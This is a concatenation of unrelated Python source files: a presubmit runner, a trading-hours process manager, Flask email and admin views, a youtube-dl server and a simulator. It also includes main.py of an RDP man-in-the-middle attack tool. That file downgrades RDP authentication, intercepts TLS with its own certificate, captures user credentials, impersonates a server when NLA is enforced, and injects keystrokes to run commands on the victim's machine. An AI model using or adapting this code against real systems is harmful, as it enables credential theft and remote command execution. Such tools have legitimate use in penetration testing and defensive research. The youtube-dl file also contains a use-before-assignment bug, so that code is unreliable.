elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(
change,
gerrit_obj,
options.verbose)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output,
options.gerrit_project)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
manage.py | import os
from multiprocessing import Process
from datetime import datetime
from time import sleep
def run():
file_path = os.getcwd() + "/serve.py"
# for sudo user
# os.system(f'echo "your password in here" |sudo -S python3.7 {file_path}')
# for general user
os.system(f'python3.7 {file_path}')
def close_program(keyword):
"""用于关闭子程序"""
import os
command = f"ps aux | grep {keyword}"
f = os.popen(command)
results = f.readlines()
pids = [c.split()[1] for c in results if "grep" not in c]
for pid in pids:
# for sudo user
# os.system(f'echo "your password in here" |sudo -S kill -9 {pid}')
# for general user
os.system(f'kill -9 {pid}')
def auth_time(current: datetime):
from datetime import time
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 5)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 35)
if ((current.today().weekday() == 6) or
(current.today().weekday() == 5 and current.time() > NIGHT_END) or
(current.today().weekday() == 0 and current.time() < DAY_START)):
return False
if current.time() <= DAY_END and current.time() >= DAY_START:
return True
if current.time() >= NIGHT_START:
return True
if current.time() <= NIGHT_END:
return True
return False
def main():
p = None
while True:
current = datetime.now()
status = auth_time(current)
if p is None and status == True:
p = Process(target=run)
p.start()
print("启动程序")
if not status and p is not None:
print("查杀子进程")
close_program("serve.py")
p.kill()
print("关闭成功")
p = None
p = Process(target=run)
p.start()
sleep(30)
if __name__ == '__main__':
main()
|
emails.py | # -*- coding: utf-8 -*-
"""
:author: perfectbullet
:url:
:copyright: © 2018
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
|
youtube-dl-server.py | from __future__ import unicode_literals
import json
import os
import subprocess
from queue import Queue
from bottle import route, run, Bottle, request, static_file
from threading import Thread
import youtube_dl
from pathlib import Path
from collections import ChainMap
app = Bottle()
app_defaults = {
'YDL_FORMAT': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]',
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_EXTRACT_AUDIO_QUALITY': '192',
'YDL_RECODE_VIDEO_FORMAT': None,
'YDL_OUTPUT_TEMPLATE': '/youtube-dl/%(title)s [%(id)s].%(ext)s',
'YDL_ARCHIVE_FILE': None,
'YDL_SERVER_HOST': '0.0.0.0',
'YDL_SERVER_PORT': 8080,
}
@app.route('/youtube-dl')
def dl_queue_list():
return static_file('index.html', root='./')
@app.route('/youtube-dl/static/:filename#.*#')
def server_static(filename):
return static_file(filename, root='./static')
@app.route('/youtube-dl/q', method='GET')
def q_size():
return {"success": True, "size": json.dumps(list(dl_q.queue))}
@app.route('/youtube-dl/q', method='POST')
def q_put():
url = request.forms.get("url")
options = {
'format': request.forms.get("format")
}
if not url:
return {"success": False, "error": "/q called without a 'url' query param"}
dl_q.put((url, options))
print("Added url " + url + " to the download queue")
return {"success": True, "url": url, "options": options}
def dl_worker():
while not done:
url, options = dl_q.get()
download(url, options)
dl_q.task_done()
def get_ydl_options(request_options):
request_vars = {
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_RECODE_VIDEO_FORMAT': None,
'YDL_OUTPUT_TEMPLATE': None
}
requested_output_path = request_options.get('output_path')
if requested_output_path:
requested_format['YDL_OUTPUT_TEMPLATE'] = requested_output_path
requested_format = request_options.get('format', 'bestvideo')
if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
elif requested_format == 'bestaudio':
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format
ydl_vars = ChainMap(request_vars, os.environ, app_defaults)
postprocessors = []
if(ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']):
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
})
if(ydl_vars['YDL_RECODE_VIDEO_FORMAT']):
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
})
return {
'format': ydl_vars['YDL_FORMAT'],
'postprocessors': postprocessors,
'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
'download_archive': ydl_vars['YDL_ARCHIVE_FILE']
}
def download(url, request_options):
with youtube_dl.YoutubeDL(get_ydl_options(request_options)) as ydl:
ydl.download([url])
dl_q = Queue()
done = False
dl_thread = Thread(target=dl_worker)
dl_thread.start()
print("Started download thread")
app_vars = ChainMap(os.environ, app_defaults)
app.run(host=app_vars['YDL_SERVER_HOST'], port=app_vars['YDL_SERVER_PORT'], debug=True)
done = True
dl_thread.join()
|
threaded_simulator.py | from multiprocessing import Process, cpu_count, Value
from simulator import Simulator
import pickle
import os
import shutil
class ThreadedSimulator:
def __init__(self, config):
self.runs = config["runs"]
self.config = config
print("You have " + str(cpu_count()) + " cores.")
print("This program will run " + str(self.runs / cpu_count()) + " simulations per core.")
def start(self):
processes = []
if not os.path.isdir("tmp"):
os.makedirs("tmp")
for i in range(self.runs):
process = Process(target=self.start_simulation, args=(i,))
process.start()
processes.append(process)
for process in processes:
process.join()
return self.unpickle_array()
def start_simulation(self, name):
sim = Simulator(self.config, name)
sim.start()
def unpickle_array(self):
contracts, profiles = [], []
for i in range(self.runs):
pathname = os.path.join("tmp", "run" + str(i))
with open(pathname + '.pkl', 'rb') as f:
result = pickle.load(f)
contracts.append(result[0])
profiles.append(result[1])
shutil.rmtree("tmp")
return contracts, profiles
if __name__ == "__main__":
import time
from backend.optimizer import Algorithm
start_time = time.time()
# Hardcoded example
config = {
"neighbourhood": "test",
"timefactor": 0.0000000000001,
"length": 86400,
"algo": Algorithm.SLSQP.value,
"runs": 16
}
sim = ThreadedSimulator(config)
results = sim.start()
print(len(results[0]))
print(len(results[1]))
end_time = time.time()
elapsed_time = end_time - start_time
print("Elapsed time: " + str(elapsed_time))
|
main.py | import socket
import ssl
import threading
import select
import re
import os
import subprocess
import time
from binascii import hexlify, unhexlify
from base64 import b64encode
from seth.args import args
from seth.parsing import *
import seth.consts as consts
class RDPProxy(threading.Thread):
"""Represents the RDP Proxy"""
def __init__(self, local_conn, remote_socket):
super(RDPProxy, self).__init__()
self.cancelled = False
self.lsock = local_conn
self.rsock = remote_socket
self.vars = {}
self.injection_key_count = -100
self.keyinjection_started = False
if b"RC4-SHA" in subprocess.check_output('openssl ciphers'.split()):
self.rc4 = True
else:
print("Warning: RC4 not available on client, attack might not work")
self.rc4 = False
# self.relay_proxy = None
# if args.relay: # TODO
# threading.Thread(target=launch_rdp_client).start()
# relay_lsock, relay_rsock = open_sockets(consts.RELAY_PORT)
# self.relay_proxy = RDPProxyNTLMRelay(relay_lsock, relay_rsock)
# self.relay_proxy.start()
def run(self):
self.handle_protocol_negotiation()
if not (self.cancelled or self.vars["RDP_PROTOCOL"] == 0):
self.enableSSL()
if args.fake_server:
try:
self.run_fake_server()
except ConnectionResetError:
print("Connection lost")
while not self.cancelled and not args.fake_server:
try:
self.forward_data()
except (ssl.SSLError, ssl.SSLEOFError) as e:
print("SSLError: %s" % str(e))
except (ConnectionResetError, OSError, ValueError) as e:
print("Connection lost (%s)" % str(e))
if "creds" in self.vars:
stop_attack()
def run_fake_server(self):
bufsize = 4096
# hide forged protocol
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
resp = consts.SERVER_RESPONSES[1]
regex = b".*%s..010c" % hexlify(b"McDn")
m = re.match(regex, hexlify(resp))
resp = set_fake_requested_protocol(resp, m,
self.vars["RDP_PROTOCOL"])
self.lsock.send(resp)
# start with channel join requests
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.lsock.send(consts.SERVER_RESPONSES[2])
# confirm all requests (reverse engineered; couldn't find
# documentation on this)
while True:
data = self.lsock.recv(bufsize)
dump_data(data, From="Client")
self.save_vars(parse_rdp(data, self.vars, From="Client"))
if "creds" in self.vars:
self.lsock.send(consts.SERVER_RESPONSES[3])
break
if data:
id = data[-1]
else:
id = 0
self.lsock.send(unhexlify(b"0300000f02f0803e00000803%02x03%02x" %
(id, id)))
self.close()
stop_attack()
def cancel(self):
self.close()
self.cancelled = True
def handle_protocol_negotiation(self):
data = self.lsock.recv(4096)
if not data:
print('No data returned')
self.cancelled = True
return None
dump_data(data, From="Client")
self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
data = downgrade_auth(data)
self.save_vars({"RDP_PROTOCOL": data[-4]})
if args.fake_server:
self.lsock.send(consts.SERVER_RESPONSES[0])
return None
self.rsock.send(data)
data = self.rsock.recv(4096)
dump_data(data, From="Server")
regex = b"0300.*000300080005000000$"
m = re.match(regex, hexlify(data))
if m:
if not args.fake_server:
print("Server enforces NLA; switching to 'fake server' mode")
args.fake_server = True
data = consts.SERVER_RESPONSES[0]
self.lsock.send(data)
def enableSSL(self):
print("Enable SSL")
try:
sslversion = get_ssl_version(self.lsock)
self.lsock = ssl.wrap_socket(
self.lsock,
server_side=True,
keyfile=args.keyfile,
certfile=args.certfile,
ssl_version=sslversion,
)
if self.rc4:
try:
self.rsock = ssl.wrap_socket(self.rsock, ciphers="RC4-SHA")
except ssl.SSLError:
print("Not using RC4-SHA because of SSL Error:", str(e))
self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
else:
self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
except ConnectionResetError:
print("Connection lost")
except ssl.SSLEOFError:
print("SSL EOF Error during handshake")
except AttributeError as e:
# happens when there is no rsock, i.e. fake_server==True
print(e)
pass
def close(self):
self.lsock.close()
if not args.fake_server:
self.rsock.close()
else:
pass
def forward_data(self):
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
for s_in in readable:
if s_in == self.lsock:
From = "Client"
s_out = self.rsock
elif s_in == self.rsock:
From = "Server"
s_out = self.lsock
try:
data = read_data(s_in)
except ssl.SSLError as e:
self.handle_ssl_error(e)
data = b""
if not data:
self.cancel()
return False
dump_data(data, From=From)
self.save_vars(parse_rdp(data, self.vars, From=From))
data = tamper_data(data, self.vars, From=From)
s_out.send(data)
if From == "Client" and "creds" in self.vars and args.inject:
self.send_keyinjection(s_out)
return True
def save_vars(self, vars):
for k, v in vars.items():
if k not in self.vars:
self.vars[k] = v
print_var(k, self.vars)
def handle_ssl_error(self, e):
if "alert access denied" in str(e):
print("TLS alert access denied, Downgrading CredSSP")
self.lsock.send(unhexlify(b"300da003020104a4060204c000005e"))
elif "alert internal error" in str(e):
# openssl connecting to windows7 with AES doesn't seem to
# work, thus try RC4 first
print("TLS alert internal error received, make sure to use RC4-SHA")
else:
raise
def send_keyinjection(self, s_out):
attack = convert_str_to_scancodes(args.inject)
if self.injection_key_count == 0:
print('Injecting command...')
for key in attack:
# use fastpath
data = unhexlify(b"4404%02x%02x" % (key[1], key[0]))
dump_data(data, From="Client", Modified=True)
s_out.send(data)
time.sleep(key[2])
print("Pwnd")
self.injection_key_count += 1
def read_data(sock):
data = sock.recv(4096)
if len(data) == 4096:
while len(data)%4096 == 0:
data += sock.recv(4096)
return data
def open_sockets(port):
local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
local_socket.bind((args.bind_ip, args.listen_port))
local_socket.listen()
print("Listening for new connection")
local_conn, addr = local_socket.accept()
print("Connection received from %s:%d" % addr)
remote_socket = None
if not args.fake_server:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((args.target_host, port))
return local_conn, remote_socket
def get_ssl_version(sock):
# Seth behaves differently depeding on the TLS protocol
# https://bugs.python.org/issue31453
# This is an ugly hack (as if the rest of this wasn't...)
versions = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
]
firstbytes = sock.recv(16, socket.MSG_PEEK)
try:
return versions[firstbytes[10]-1]
except IndexError:
print("Unexpected SSL version: %s" % hexlify(firstbytes))
return versions[-1]
# def launch_rdp_client():
# time.sleep(1)
# p = subprocess.Popen(
# ["xfreerdp",
# "/v:%s:%d" % (args.bind_ip, consts.RELAY_PORT),
# "/u:%s\\%s" % (domain, user),
# ],
# )
def stop_attack():
os._exit(0)
def convert_str_to_scancodes(string):
uppercase_letters = "ABCDEFGHJIJKLMNOPQRSTUVWXYZ"
# Actually, the following depends on the keyboard layout
special_chars = {
":": ".",
"{": "[",
"}": "]",
"!": "1",
"@": "2",
"#": "3",
"$": "4",
"%": "5",
"^": "6",
"&": "7",
"*": "8",
"(": "9",
")": "0",
"<": ",",
">": ".",
"\"": "'",
"|": "\\",
"?": "/",
"_": "-",
"+": "=",
}
UP = 1
DOWN = 0
MOD = 2
# For some reason, the meta (win) key needs an additional modifier (+2)
result = [[consts.REV_SCANCODE["LMeta"], DOWN + MOD, .2],
[consts.REV_SCANCODE["R"], DOWN, 0],
[consts.REV_SCANCODE["R"], UP, 0.2],
[consts.REV_SCANCODE["LMeta"], UP + MOD, .1],
]
for c in string:
if c in uppercase_letters:
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
elif c in special_chars:
c = special_chars[c]
result.append([consts.REV_SCANCODE["LShift"], DOWN, 0.02])
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result.append([consts.REV_SCANCODE["LShift"], UP, 0])
else:
c = c.upper()
result.append([consts.REV_SCANCODE[c], DOWN, 0])
result.append([consts.REV_SCANCODE[c], UP, 0])
result += [[consts.REV_SCANCODE["Enter"], DOWN, 0],
[consts.REV_SCANCODE["Enter"], UP, 0],
]
return result
def run():
try:
while True:
lsock, rsock = open_sockets(args.target_port)
RDPProxy(lsock, rsock).start()
except KeyboardInterrupt:
pass
|
view.py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
import math
import os
import random
import string
import threading
import time
from flask import url_for, render_template, request, flash, send_from_directory
from flask_login import login_required, current_user
from werkzeug.utils import redirect
from . import main
from app import utils
from models.Lin_exec_check import lin_execcheck, lin_only_check
from models.win_exec_check import win_execcheck, win_only_check
from app.main.forms import LinuxForm, WindowsForm, ResetpwdForm, UploadForm
from app.dbset import Tasklist, User
from app.utils import file_to_zip, zip_to_file
def online(checkdef, form, view):
if request.method == 'POST':
if form.validate_on_submit():
ip = form.formip.raw_data[0]
port = form.formport.raw_data[0]
user = form.formuser.raw_data[0]
passwd = form.formpwd.raw_data[0]
note = form.formnote.raw_data[0]
theorder = ''.join(random.sample(string.digits, 10))
cr = Tasklist.create(theorder=theorder, time=str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())),
status='0', note=note)
th1 = threading.Thread(target=checkdef, args=(ip, port, user, passwd, theorder,))
th1.start()
flash('任务提交成功,任务编号:' + theorder)
else:
utils.flash_errors(form)
return render_template(view, form=form)
def offline(checkdef, systemtype, form, view):
if request.method == 'POST':
theorder = ''.join(random.sample(string.digits, 10))
note = form.formnote.raw_data[0]
zipfile = request.files.get('formfile')
workpath = os.getcwd()
zip_src = workpath + '/models/temp/' + theorder + '.zip'
zipfile.save(zip_src)
Rawipdir = zip_to_file(theorder, zip_src, systemtype)
if Rawipdir == 'notzip':
flash('zip压缩包格式错误或有损')
return render_template(view, form=form)
cr = Tasklist.create(theorder=theorder, time=str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())),
status='0',
note=note)
th1 = threading.Thread(target=checkdef, args=(Rawipdir, theorder,))
th1.start()
flash('任务提交成功,任务编号:' + theorder)
return render_template(view, form=form)
def check_result(view):
action = request.args.get('action')
theorder = request.args.get('id')
if action == 'delete':
Tasklist.delete().where(Tasklist.theorder == theorder).execute()
if action == 'down':
(zipdir, zipbao) = file_to_zip(theorder)
return send_from_directory(zipdir, zipbao, as_attachment=True)
page = int(request.args.get('page')) if request.args.get('page') else 1
length = int(request.args.get('length')) if request.args.get('length') else 10
query = Tasklist.select().order_by(Tasklist.time.desc())
total_count = query.count()
if page: query = query.paginate(page, length)
dict = {'content': utils.query_to_list(query), 'total_count': total_count,
'total_page': math.ceil(total_count / length), 'page': page, 'length': length}
return render_template(view, form=dict)
def reset_passwd(form, view):
if request.method == 'POST':
if form.validate_on_submit():
oldpwd = form.oldpwd.raw_data[0]
newpwd = form.newpwd.raw_data[0]
user = User.get(User.username == current_user.username)
if user.verify_password(oldpwd):
user.update_password(current_user.username, newpwd)
flash('管理员密码修改成功')
else:
flash('管理员原密码错误')
else:
utils.flash_errors(form)
return render_template(view, form=form)
@main.route('/', methods=['GET'])
@login_required
def root():
return redirect(url_for('main.index'))
@main.route('/index', methods=['GET'])
@login_required
def index():
num1 = Tasklist.select().count()
num2 = Tasklist.select().where(Tasklist.status == '0').count()
return render_template('index.html', num1=num1, num2=num2, current_user=current_user)
@main.route('/onlinelinux', methods=['GET', 'POST'])
@login_required
def onlinelinux():
checkdef = lin_execcheck
return online(checkdef, LinuxForm(), 'onlinelinux.html')
@main.route('/onlinewindows', methods=['GET', 'POST'])
@login_required
def onlinewindows():
checkdef = win_execcheck
return online(checkdef, WindowsForm(), 'onlinewindows.html')
@main.route('/offlinelinux', methods=['GET', 'POST'])
@login_required
def offlinelinux():
checkdef = lin_only_check
systemtype = 'Linux'
return offline(checkdef, systemtype, UploadForm(), 'offlinelinux.html')
@main.route('/offlinewindows', methods=['GET', 'POST'])
@login_required
def offlinewindows():
checkdef = win_only_check
systemtype = 'Windows'
return offline(checkdef, systemtype, UploadForm(), 'offlinewindows.html')
@main.route('/result', methods=['GET', 'POST'])
@login_required
def result():
return check_result('result.html')
@main.route('/resetpwd', methods=['GET', 'POST'])
@login_required
def resetpwd():
return reset_passwd(ResetpwdForm(), 'resetpwd.html')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.